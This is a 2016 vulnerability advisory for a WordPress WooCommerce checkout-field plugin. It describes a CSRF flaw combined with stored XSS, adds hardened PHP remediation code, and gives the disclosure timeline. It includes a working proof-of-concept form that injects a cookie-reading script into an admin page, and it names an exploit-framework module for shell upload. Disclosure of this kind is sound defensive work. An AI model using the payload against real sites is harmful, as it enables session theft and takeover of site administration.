Homepage

https://wordpress.org/plugins/woo-custom-checkout-field/

Overview

Due to a lack of CSRF mitigation and entity encoding in the ccf_insert function found on line 118 of include/ccf.php and in the output generated by template/datagrid.php, it is possible to store a script payload that executes in the context of an admin user (stored cross-site scripting).
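The two root causes named above, a form handler with no CSRF token and a datagrid that echoes stored values without encoding, map onto standard WordPress APIs. The following is an added illustration written for this advisory, not the plugin's own code: the function name ccf_insert and the form field names (txt_field_name, txt_field_class, ...) come from the page; the table name, the row layout, the required capability and the helper names ccf_insert_hardened and ccf_render_datagrid are assumptions.

```php
<?php
// Added illustration, not the plugin's code: a hardened shape for a settings-page
// handler such as the ccf_insert() named in the advisory. Assumed: the handler runs
// from the admin menu callback, the POST field names match the advisory's form, and
// a custom table (prefix + 'ccf_fields') holds one row per checkout field.

// 1. Render the form with a nonce. WordPress nonces are bound to the user's ID and
//    session token, so a page hosted on another origin cannot supply a valid one.
function ccf_render_add_field_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=ccf_settings_menu' ) ); ?>">
        <?php wp_nonce_field( 'ccf_add_field', 'ccf_add_field_nonce' ); ?>
        <input type="text" name="txt_field_name" value="">
        <input type="text" name="txt_field_class" value="">
        <input type="text" name="txt_field_placeholder" value="">
        <select name="txt_field_type">
            <option value="text">text</option>
            <option value="select">select</option>
        </select>
        <input type="text" name="txt_field_options" value="">
        <input type="submit" name="add_field" value="Submit">
    </form>
    <?php
}

// 2. Handle the POST: capability check, nonce check, then sanitize every input
//    before it reaches the database.
function ccf_insert_hardened() {
    if ( ! isset( $_POST['add_field'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Terminates with a 403 page when the nonce is missing, expired or forged.
    check_admin_referer( 'ccf_add_field', 'ccf_add_field_nonce' );

    // Whitelist the field type instead of storing arbitrary text.
    $allowed_types = array( 'text', 'textarea', 'select', 'checkbox' );
    $type = isset( $_POST['txt_field_type'] ) ? sanitize_key( $_POST['txt_field_type'] ) : 'text';
    if ( ! in_array( $type, $allowed_types, true ) ) {
        $type = 'text';
    }

    $row = array(
        'field_name'        => sanitize_text_field( wp_unslash( $_POST['txt_field_name'] ?? '' ) ),
        // A CSS class only needs [A-Za-z0-9_-]; sanitize_html_class() strips everything else.
        'field_class'       => sanitize_html_class( wp_unslash( $_POST['txt_field_class'] ?? '' ) ),
        'field_placeholder' => sanitize_text_field( wp_unslash( $_POST['txt_field_placeholder'] ?? '' ) ),
        'field_type'        => $type,
        'field_options'     => sanitize_text_field( wp_unslash( $_POST['txt_field_options'] ?? '' ) ),
    );

    global $wpdb;
    // Assumed table name. $wpdb->insert() builds a prepared statement from the %s formats.
    $wpdb->insert( $wpdb->prefix . 'ccf_fields', $row, array( '%s', '%s', '%s', '%s', '%s' ) );
}

// 3. Render the stored rows (the datagrid) with context-appropriate escaping, so a
//    row written before the fix is shown as text rather than executed.
function ccf_render_datagrid( array $rows ) {
    echo '<table class="widefat">';
    echo '<tr><th>Name</th><th>Class</th><th>Placeholder</th><th>Type</th></tr>';
    foreach ( $rows as $r ) {
        printf(
            '<tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>',
            esc_html( $r['field_name'] ),
            esc_html( $r['field_class'] ),
            esc_html( $r['field_placeholder'] ),
            esc_html( $r['field_type'] )
        );
    }
    echo '</table>';
}
```

The two controls are independent and both are needed: the nonce check stops a cross-site form from reaching the insert at all, while escaping on output protects against rows that were already stored by the time the plugin was updated. If a value is later placed in an attribute (for example the class on the rendered checkout field) use esc_attr() at that point rather than relying on the sanitization applied at insert time.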

CVSS Score

4.8

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)

Versions Affected

1.3.2 and below

Solution

Upgrade to version 1.3.5

Proof of Concept

<form method="post" action="http://[target]/wp-admin/admin.php?page=ccf_settings_menu">
    <input type="text" name="txt_field_name" value="field_name">
    <input type="text" name="txt_field_class" value="&lt;script&gt;alert(document.cookie);&lt;/script&gt;">
    <input type="text" name="txt_field_placeholder" value="placeholder">
    <input type="text" name="txt_field_type" value="text">
    <input type="text" name="txt_field_options" value="">
    <input type="submit" name="add_field" value="Submit">
</form>

WordPress Exploit Framework Module

exploit/xss/stored/woo_custom_checkout_field_xss_shell_upload

WPVDB-ID

8567

Disclosure Timeline

  • 2016-07-23: Identified vulnerability, contacted vendor with POC and advice on how to resolve the issue.
  • 2016-07-25: No response from vendor; contacted WordPress to report the issue.
  • 2016-07-26: Public disclosure
  • 2016-07-26: Plugin removed by WordPress pending a fix from the vendor
  • 2016-07-29: Vendor released an update which fixes the issue